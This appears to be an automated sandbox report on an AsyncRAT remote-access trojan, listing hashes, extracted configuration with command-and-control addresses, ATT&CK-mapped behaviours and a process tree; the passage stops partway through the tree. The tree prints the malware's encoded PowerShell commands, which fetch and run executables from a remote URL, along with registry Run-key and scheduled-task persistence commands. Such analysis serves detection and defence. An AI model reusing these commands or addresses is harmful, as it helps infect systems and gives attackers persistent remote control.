asyncrat | bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31

Analysis

max time kernel
148s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
06-12-2022 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe
Size

537KB
MD5

2ce459cbd15f96b92c6b411b9eaeb24c
SHA1

d4ef5e179d1e4510141537bd59dca1d6fdb83a6a
SHA256

bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31
SHA512

f5385c52c7945cfb2196edbda6aebd7007d383fc837712585c501387704709f9882f36559736b0804455a5c9eb09015d4f6e88135339c340c643554b0d4cb53c
SSDEEP

12288:z4lThwQGIQilGzWTifG1g6eUt5uPPRg7zhTnn6wi8TQBVW6:slTOFq7TifGG6wR6TnRi8To

Score

10^/10

asyncrat defendersmartscren system guard runtime persistence rat upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/3164-257-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/3392-294-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
25	3024	powershell.exe
45	3508	powershell.exe
49	4676	powershell.exe
55	4944	powershell.exe
59	3936	powershell.exe
62	1472	powershell.exe
66	3964	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 19 IoCs

Processes:

VJW2wRNe8y.exeaiWaVZJqnm.exexOXu0EYeat.exednZucbVxTJ.exegK2VEroS6X.exedu5RtBTvBZ.exeiisFNkBRjf.exefw7g9vhRbO.exeMA9xws7BZE.exeupr2HxK3s0.exekk3hyRianI.exeJDSG3.exeJDSG4.exeJDSDS4.exePOSA12.exeMNZXHA36.exePOIXCB3.exeJDSG3.exeBVNMXCGHJ7.exe

pid	process
384	VJW2wRNe8y.exe
4224	aiWaVZJqnm.exe
5104	xOXu0EYeat.exe
948	dnZucbVxTJ.exe
2608	gK2VEroS6X.exe
2252	du5RtBTvBZ.exe
4016	iisFNkBRjf.exe
2092	fw7g9vhRbO.exe
2272	MA9xws7BZE.exe
1764	upr2HxK3s0.exe
1604	kk3hyRianI.exe
5096	JDSG3.exe
1432	JDSG4.exe
3040	JDSDS4.exe
4060	POSA12.exe
3848	MNZXHA36.exe
3960	POIXCB3.exe
1944	JDSG3.exe
112	BVNMXCGHJ7.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1180-132-0x00007FF7419E0000-0x00007FF741B43000-memory.dmp	upx
behavioral1/memory/1180-182-0x00007FF7419E0000-0x00007FF741B43000-memory.dmp	upx

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

xOXu0EYeat.exednZucbVxTJ.exeiisFNkBRjf.exefw7g9vhRbO.exeMA9xws7BZE.exeupr2HxK3s0.exeaiWaVZJqnm.exeVJW2wRNe8y.exegK2VEroS6X.exedu5RtBTvBZ.exekk3hyRianI.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	xOXu0EYeat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	dnZucbVxTJ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	iisFNkBRjf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	fw7g9vhRbO.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	MA9xws7BZE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	upr2HxK3s0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	aiWaVZJqnm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	VJW2wRNe8y.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	gK2VEroS6X.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	du5RtBTvBZ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	kk3hyRianI.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exepowershell.exePOIXCB3.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	POIXCB3.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

JDSG4.exeJDSG3.exePOSA12.exeJDSDS4.exe

description	pid	process	target process
PID 1432 set thread context of 3164	1432	JDSG4.exe	RegAsm.exe
PID 5096 set thread context of 2292	5096	JDSG3.exe	RegAsm.exe
PID 4060 set thread context of 3392	4060	POSA12.exe	RegAsm.exe
PID 3040 set thread context of 1580	3040	JDSDS4.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4068 3848 WerFault.exe MNZXHA36.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1492 schtasks.exe
4352 schtasks.exe

pid	pid_target	process	target process
4068	3848	WerFault.exe	MNZXHA36.exe

pid	process
1492	schtasks.exe
4352	schtasks.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3024	powershell.exe
3024	powershell.exe
4676	powershell.exe
4676	powershell.exe
3508	powershell.exe
3508	powershell.exe
3936	powershell.exe
3936	powershell.exe
4944	powershell.exe
4944	powershell.exe
1472	powershell.exe
1472	powershell.exe
3964	powershell.exe
3964	powershell.exe
3332	powershell.exe
3332	powershell.exe
3024	powershell.exe
3332	powershell.exe
512	powershell.exe
512	powershell.exe
4772	powershell.exe
4772	powershell.exe
4676	powershell.exe
1872	powershell.exe
1872	powershell.exe
3508	powershell.exe
3936	powershell.exe
4944	powershell.exe
1472	powershell.exe
3964	powershell.exe
4772	powershell.exe
1872	powershell.exe
512	powershell.exe
3020	powershell.exe
3020	powershell.exe
3020	powershell.exe
3364	powershell.exe
3364	powershell.exe
3364	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeJDSG3.exepowershell.exeJDSDS4.exe

description	pid	process
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeDebugPrivilege	3936	powershell.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	512	powershell.exe
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	5096	JDSG3.exe
Token: SeDebugPrivilege	3364	powershell.exe
Token: SeDebugPrivilege	3040	JDSDS4.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.execmd.execmd.execmd.execmd.exeaiWaVZJqnm.execmd.exeVJW2wRNe8y.exexOXu0EYeat.execmd.execmd.exednZucbVxTJ.exegK2VEroS6X.execmd.execmd.exedu5RtBTvBZ.exeiisFNkBRjf.execmd.execmd.exefw7g9vhRbO.exeMA9xws7BZE.exekk3hyRianI.exe

description	pid	process	target process
PID 1180 wrote to memory of 4440	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 4440	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 4992	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 4992	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 4440 wrote to memory of 384	4440	cmd.exe	VJW2wRNe8y.exe
PID 4440 wrote to memory of 384	4440	cmd.exe	VJW2wRNe8y.exe
PID 1180 wrote to memory of 1224	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 1224	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 4992 wrote to memory of 4224	4992	cmd.exe	aiWaVZJqnm.exe
PID 4992 wrote to memory of 4224	4992	cmd.exe	aiWaVZJqnm.exe
PID 1180 wrote to memory of 3116	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 3116	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1224 wrote to memory of 5104	1224	cmd.exe	xOXu0EYeat.exe
PID 1224 wrote to memory of 5104	1224	cmd.exe	xOXu0EYeat.exe
PID 1180 wrote to memory of 4428	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 4428	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 4604	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 4604	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 4728	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 4728	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 3116 wrote to memory of 948	3116	cmd.exe	dnZucbVxTJ.exe
PID 3116 wrote to memory of 948	3116	cmd.exe	dnZucbVxTJ.exe
PID 4224 wrote to memory of 3508	4224	aiWaVZJqnm.exe	powershell.exe
PID 4224 wrote to memory of 3508	4224	aiWaVZJqnm.exe	powershell.exe
PID 4428 wrote to memory of 2608	4428	cmd.exe	gK2VEroS6X.exe
PID 4428 wrote to memory of 2608	4428	cmd.exe	gK2VEroS6X.exe
PID 384 wrote to memory of 3024	384	VJW2wRNe8y.exe	powershell.exe
PID 384 wrote to memory of 3024	384	VJW2wRNe8y.exe	powershell.exe
PID 1180 wrote to memory of 3452	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 3452	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 5104 wrote to memory of 4676	5104	xOXu0EYeat.exe	powershell.exe
PID 5104 wrote to memory of 4676	5104	xOXu0EYeat.exe	powershell.exe
PID 1180 wrote to memory of 4536	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 4536	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 4604 wrote to memory of 2252	4604	cmd.exe	du5RtBTvBZ.exe
PID 4604 wrote to memory of 2252	4604	cmd.exe	du5RtBTvBZ.exe
PID 1180 wrote to memory of 1384	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 1384	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 4728 wrote to memory of 4016	4728	cmd.exe	iisFNkBRjf.exe
PID 4728 wrote to memory of 4016	4728	cmd.exe	iisFNkBRjf.exe
PID 948 wrote to memory of 4944	948	dnZucbVxTJ.exe	powershell.exe
PID 948 wrote to memory of 4944	948	dnZucbVxTJ.exe	powershell.exe
PID 2608 wrote to memory of 3936	2608	gK2VEroS6X.exe	powershell.exe
PID 2608 wrote to memory of 3936	2608	gK2VEroS6X.exe	powershell.exe
PID 1180 wrote to memory of 5112	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 1180 wrote to memory of 5112	1180	bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe	cmd.exe
PID 3452 wrote to memory of 2092	3452	cmd.exe	fw7g9vhRbO.exe
PID 3452 wrote to memory of 2092	3452	cmd.exe	fw7g9vhRbO.exe
PID 4536 wrote to memory of 2272	4536	cmd.exe	MA9xws7BZE.exe
PID 4536 wrote to memory of 2272	4536	cmd.exe	MA9xws7BZE.exe
PID 2252 wrote to memory of 1472	2252	du5RtBTvBZ.exe	powershell.exe
PID 2252 wrote to memory of 1472	2252	du5RtBTvBZ.exe	powershell.exe
PID 4016 wrote to memory of 3964	4016	iisFNkBRjf.exe	powershell.exe
PID 4016 wrote to memory of 3964	4016	iisFNkBRjf.exe	powershell.exe
PID 1384 wrote to memory of 1764	1384	cmd.exe	upr2HxK3s0.exe
PID 1384 wrote to memory of 1764	1384	cmd.exe	upr2HxK3s0.exe
PID 5112 wrote to memory of 1604	5112	cmd.exe	kk3hyRianI.exe
PID 5112 wrote to memory of 1604	5112	cmd.exe	kk3hyRianI.exe
PID 2092 wrote to memory of 3332	2092	fw7g9vhRbO.exe	powershell.exe
PID 2092 wrote to memory of 3332	2092	fw7g9vhRbO.exe	powershell.exe
PID 2272 wrote to memory of 512	2272	MA9xws7BZE.exe	powershell.exe
PID 2272 wrote to memory of 512	2272	MA9xws7BZE.exe	powershell.exe
PID 1604 wrote to memory of 1872	1604	kk3hyRianI.exe	powershell.exe
PID 1604 wrote to memory of 1872	1604	kk3hyRianI.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe
"C:\Users\Admin\AppData\Local\Temp\bb57c20116377a50473e83604488f1935311dbf93a419cdeb41cf051ffd22b31.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1180

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\VJW2wRNe8y.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4440

C:\Users\Admin\AppData\Local\Temp\VJW2wRNe8y.exe
C:\Users\Admin\AppData\Local\Temp\VJW2wRNe8y.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZABrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADAAMQAyADIAMwA2ADkAMAAzADQAMQAvAHAAbABsAG0AbQBkAGkAaQBwAG0ALgBlAHgAZQAnACwAIAA8ACMAeABjAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAGoAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAGYAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBKAEQAUwBHADMALgBlAHgAZQAnACkAKQA8ACMAZwByAHkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZgB1AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAcABiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEoARABTAEcAMwAuAGUAeABlACcAKQA8ACMAdwBrAGsAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Users\Admin\AppData\Roaming\JDSG3.exe
"C:\Users\Admin\AppData\Roaming\JDSG3.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5096

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:2292

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\aiWaVZJqnm.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4992

C:\Users\Admin\AppData\Local\Temp\aiWaVZJqnm.exe
C:\Users\Admin\AppData\Local\Temp\aiWaVZJqnm.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAawBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADEANAAwADEANgAzADEANwA1ADEAMwAvAEMAUgAuAGUAeABlACcALAAgADwAIwBnAHcAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZQBsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAZABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEoARABTAEcANAAuAGUAeABlACcAKQApADwAIwBuAHEAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABqAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASgBEAFMARwA0AC4AZQB4AGUAJwApADwAIwB5AHUAZQAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3508

C:\Users\Admin\AppData\Roaming\JDSG4.exe
"C:\Users\Admin\AppData\Roaming\JDSG4.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
6⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
6⤵
PID:3308

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:1492

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
6⤵
PID:3164

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\xOXu0EYeat.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1224

C:\Users\Admin\AppData\Local\Temp\xOXu0EYeat.exe
C:\Users\Admin\AppData\Local\Temp\xOXu0EYeat.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZQBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADQANAA5ADQAMAA5ADMAMwAxADUAMAAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAdQBhAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAG4AagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAHAAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBKAEQAUwBEAFMANAAuAGUAeABlACcAKQApADwAIwB3AHAAeAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAG4AawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBkAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASgBEAFMARABTADQALgBlAHgAZQAnACkAPAAjAGUAYgBoACMAPgA="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676

C:\Users\Admin\AppData\Roaming\JDSDS4.exe
"C:\Users\Admin\AppData\Roaming\JDSDS4.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3040

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:1580

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\dnZucbVxTJ.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3116

C:\Users\Admin\AppData\Local\Temp\dnZucbVxTJ.exe
C:\Users\Admin\AppData\Local\Temp\dnZucbVxTJ.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYwBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADUANAAzADMANgAxADcANAAxADYAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGoAdABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBrAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBrAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABPAFMAQQAxADIALgBlAHgAZQAnACkAKQA8ACMAZABoAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwByAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAbABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATwBTAEEAMQAyAC4AZQB4AGUAJwApADwAIwB1AG4AcQAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4944

C:\Users\Admin\AppData\Roaming\POSA12.exe
"C:\Users\Admin\AppData\Roaming\POSA12.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
6⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3364

C:\Windows\SysWOW64\cmd.exe
